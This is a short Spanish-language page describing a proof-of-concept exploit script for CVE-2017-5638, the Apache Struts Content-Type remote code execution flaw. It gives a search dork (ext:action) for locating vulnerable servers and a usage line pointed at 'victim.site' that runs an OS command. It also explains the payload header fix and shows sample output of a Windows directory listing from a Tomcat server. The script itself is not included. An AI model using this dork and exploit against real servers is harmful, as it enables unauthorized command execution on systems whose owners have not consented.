
Ejemplo de código PoC para CVE-2017-5638 | Apache Struts Exploit
Código PoC de ejemplo para CVE-2017-5638 | Exploit de Apache Struts | DORK: ext:action
USO: python struts.py https://victim.site dir
El script Python inicial que se publicó no formateaba correctamente el encabezado Content-Type. Recodifiqué el encabezado Content-Type para formatear correctamente Content-Type:%20{Exploit}. También agregué logging y Requests, y luego volqué las propiedades del objeto a stdout.
EJEMPLO DE SALIDA
Verificar CVE-2017-5638 por XSS.Cx
El volumen en la unidad D no tiene etiqueta. El número de serie del volumen es 2A7B-A245. Directorio de d:\Program Files\Apache Software Foundation\Tomcat 9.0